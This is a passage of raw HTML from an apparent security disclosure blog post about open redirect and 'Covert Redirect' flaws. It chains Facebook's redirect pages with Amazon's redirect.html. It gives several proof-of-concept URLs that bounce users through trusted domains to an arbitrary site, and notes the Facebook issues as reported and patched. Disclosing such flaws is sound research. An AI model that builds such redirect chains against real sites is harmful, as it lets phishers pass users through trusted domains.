noQPv3m<wbr></wbr>R5BNHRFTh_<wbr></wbr>6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt<wbr></wbr>j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8<wbr></wbr>V4qiKiVFKTEFMZASaZFon41VFCbhxk<wbr></wbr>X0Bi62Ko64PY6uP64tCMWh6yX2o0JM<wbr></wbr>c0mJWFJRp1695OCKgLXf0udRyWDEST<wbr></wbr>yYgJXIlxecCmlwCEbleAsE-<wbr></wbr>wtDXNOfDTXOzApr1sZO_58FBRaw-<wbr></wbr>K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur<wbr></wbr>9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-<wbr></wbr>UqdakiEEIBq750KxVjaAdCyqJp_<wbr></wbr>5EJ-<wbr></wbr>yVMK3f2pMX7cQ2Lw6u434hHimuLN9V<wbr></wbr>DPLkpSiMlPOa8RkarDSred73IfQiv-<wbr></wbr>PluegYDfunZFxj1KvcAlzhVZsL-<wbr></wbr>a52hJmXrOrzKuV0hyZaBLtAIo6AEoX<wbr></wbr>XV30D-<wbr></wbr>6iraSUphkOFzYt3ah6oRrmXLQZKm2E<wbr></wbr>8Cuag5d_<wbr></wbr>rAnwvIr98dn4OSa8Z4MCZemI3uH8cj<wbr></wbr>xr86aE046uTA_<wbr></wbr>Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h<wbr></wbr>6WiUO-<wbr></wbr>jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl<wbr></wbr>18iaN8wkylsTk8aVBn6G1xZadSL0b5<wbr></wbr>R3NgsYfQUVtV0g9slnOLNkgq0NLMAk<wbr></wbr>0kWFs</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa.php%3Fu%3Dhttp%253A%252F%252Fwww.tetraph.com%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid%3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROStFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJtC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN_tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dHx1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwWxeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7EcZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBtj5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1695OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSred73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/<wbr></wbr>login.php?next=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fa.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.stackoverflow.com%26mac%<wbr></wbr>3DAQKyRHClixA20iGL%26__tn__%<wbr></wbr>3D%252AB%26eid%<wbr></wbr>3DAQLAHC7szSXhT3FaEBXe5YFsOC0k<wbr></wbr>EM4nN9PlVovdilvuzROStFXoYqptlK<wbr></wbr>pcJAzHNTLpxWAIrmJYsR6RVG_<wbr></wbr>Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_<wbr></wbr>eVS895Eh6fSwxH3fgfWcNDrEl5_<wbr></wbr>lFgRbrJtC71R68rW_<wbr></wbr>VXS9QCN7Po9wTWDnbyZTaXawdrdQyi<wbr></wbr>bryvA56Spr5GcUDUboRFxy8YSr2ahU<wbr></wbr>V_<wbr></wbr>goDAQA3OKmCACEn8CmyMrOT5gZq3iw<wbr></wbr>usysdchRxLIv5N82-<wbr></wbr>GMTiDxXXgkDYf1P7XwvklWpfy_<wbr></wbr>cEItZzV5v0P7fRZB3qiq_<wbr></wbr>RDx9jhEzndlJhUJL2aWE0ldPmGKGz9<wbr></wbr>xWyvPaPLOwzBo23GQbpj2ZN_<wbr></wbr>tw9B9tz2l3tGIN1yegd_<wbr></wbr>Wf6PSFIZOuBXfZILvmILcxg3qz4dHx<wbr></wbr>1fmgPZBpf_34mPnMEkgZqbT2WeV_<wbr></wbr>GZKz8RDIg88D3vrmwyMwWxeh3xyGud<wbr></wbr>djZUjOUjPCUwrgSrWZK3XHRA7TA7tW<wbr></wbr>IsQ4X1bsjx9c72mm8bZmmRBRJwqOcj<wbr></wbr>sW0QEVETs_<wbr></wbr>Cs9pS9QBkgX8yVPJCHuk1v_<wbr></wbr>xkj4EHHH9sNP7a4GRs8olklBTKhCcJ<wbr></wbr>908sVrQVT2I-<wbr></wbr>cQYw2SVU9hWaWWjX2AGt3WpdT2kx6S<wbr></wbr>IPoPQpX5cIC4Lcfaa7EcZFBnoQPv3m<wbr></wbr>R5BNHRFTh_<wbr></wbr>6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt<wbr></wbr>j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8<wbr></wbr>V4qiKiVFKTEFMZASaZFon41VFCbhxk<wbr></wbr>X0Bi62Ko64PY6uP64tCMWh6yX2o0JM<wbr></wbr>c0mJWFJRp1695OCKgLXf0udRyWDEST<wbr></wbr>yYgJXIlxecCmlwCEbleAsE-<wbr></wbr>wtDXNOfDTXOzApr1sZO_58FBRaw-<wbr></wbr>K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur<wbr></wbr>9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-<wbr></wbr>UqdakiEEIBq750KxVjaAdCyqJp_<wbr></wbr>5EJ-<wbr></wbr>yVMK3f2pMX7cQ2Lw6u434hHimuLN9V<wbr></wbr>DPLkpSiMlPOa8RkarDSred73IfQiv-<wbr></wbr>PluegYDfunZFxj1KvcAlzhVZsL-<wbr></wbr>a52hJmXrOrzKuV0hyZaBLtAIo6AEoX<wbr></wbr>XV30D-<wbr></wbr>6iraSUphkOFzYt3ah6oRrmXLQZKm2E<wbr></wbr>8Cuag5d_<wbr></wbr>rAnwvIr98dn4OSa8Z4MCZemI3uH8cj<wbr></wbr>xr86aE046uTA_<wbr></wbr>Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h<wbr></wbr>6WiUO-<wbr></wbr>jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl<wbr></wbr>18iaN8wkylsTk8aVBn6G1xZadSL0b5<wbr></wbr>R3NgsYfQUVtV0g9slnOLNkgq0NLMAk<wbr></wbr>0kWFs</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Video:</b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be">https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be</a></span></div>
</div>
<div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
</div>
<div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Blog Details:</b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html">http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Those vulnerabilities were reported to Facebook in 2014 and they have been patched.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Several
other similar products 0-day vulnerabilities have been found by some
other bug hunter researchers before. Facebook has patched some of
them. "The Full Disclosure mailing list is a public forum for detailed
discussion of vulnerabilities and exploitation techniques, as well as
tools, papers, news, and events of interest to the community. FD differs
from other security lists in its open nature and support for
researchers' right to decide how to disclose their own discovered bugs.
The full disclosure movement has been credited with forcing vendors to
better secure their products and to publicly acknowledge and fix flaws
rather than hide them. Vendor legal intimidation and censorship attempts
are not tolerated here!" All the fllowing web securities have been
published here, Buffer overflow, HTTP Response Splitting (CRLF), CMD
Injection, SQL injection, Phishing, Cross-site scripting, CSRF,
Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage,
Denial of Service, File Inclusion, Weak Encryption, Privilege
Escalation, Directory Traversal, HTML Injection, Spam. Large number of
Facebook bugs were published here. FD also publishes suggestions,
advisories, solutions details related to Open Redirect vulnerabilities
and cyber intelligence recommendations.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4) </b><b>Amazon Covert Redirect Security Vulnerability Based on Facebook </b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Since Facebook is trusted by large numbers of other websites. Those vulnerabilities can be used to do "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" to other websites such as Amazon.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Domain: </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.amazon.com/">http://www.amazon.com</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"American
electronic commerce company with headquarters in Seattle, Washington.
It is the largest Internet-based retailer in the United States.
Amazon.com started as an online bookstore, but soon diversified, selling
DVDs, Blu-rays, CDs, video downloads/streaming, MP3
downloads/streaming, software, video games, electronics, apparel,
furniture, food, toys and jewelry. The company also produces consumer
electronics—notably, Amazon Kindle e-book readers, Fire tablets, Fire TV
and Fire Phone — and is a major provider of cloud computing services.
Amazon also sells certain low-end products like USB cables under its
inhouse brand AmazonBasics. Amazon has separate retail websites for
United States, United Kingdom & Ireland, France, Canada, Germany,
The Netherlands, Italy, Spain, Australia, Brazil, Japan, China, India
and Mexico. Amazon also offers international shipping to certain other
countries for some of its products. In 2011, it had professed an
intention to launch its websites in Poland and Sweden." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability exists at "redirect.html?" page with "&location" parameter, e.g.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.google.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Fl.php%3Fu%<wbr></wbr>3Dhttp%253A%252F%252Fwww.<wbr></wbr>google.com%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>More Details:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://tetraph.com/covert_redirect/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/covert_<wbr></wbr>redirect/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html" target="_blank">http://tetraph.com/covert_<wbr></wbr>redirect/oauth2_openid_covert_<wbr></wbr>redirect.html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4.1)</b> When
a user is redirected from Amazon to another site, Amazon will check
parameters "&token". If the redirected URL's domain is OK, Amazon
will allow the reidrection.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">However,
if the URLs in a redirected domain have open URL redirection
vulnerabilities themselves, a user could be redirected from Amazon to a
vulnerable URL in that domain first and later be redirected from this
vulnerable site to a malicious site. This is as if being redirected from
Amazon directly.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">One of the vulnerable domain is,</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4.2)</b> Use one of webpages for the following tests. The webpage address is "<a href="http://www.inzeed.com/kaleidoscope" target="_blank">http://www.inzeed.com/<wbr></wbr>kaleidoscope</a>". Suppose it is malicious.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Famazon%3Fv%3Dapp_165157536856903&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Famazon%3Fv%<wbr></wbr>3Dapp_165157536856903&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.inzeed.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Fl.php%3Fu%<wbr></wbr>3Dhttp%253A%252F%252Fwww.<wbr></wbr>inzeed.com%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
</div>
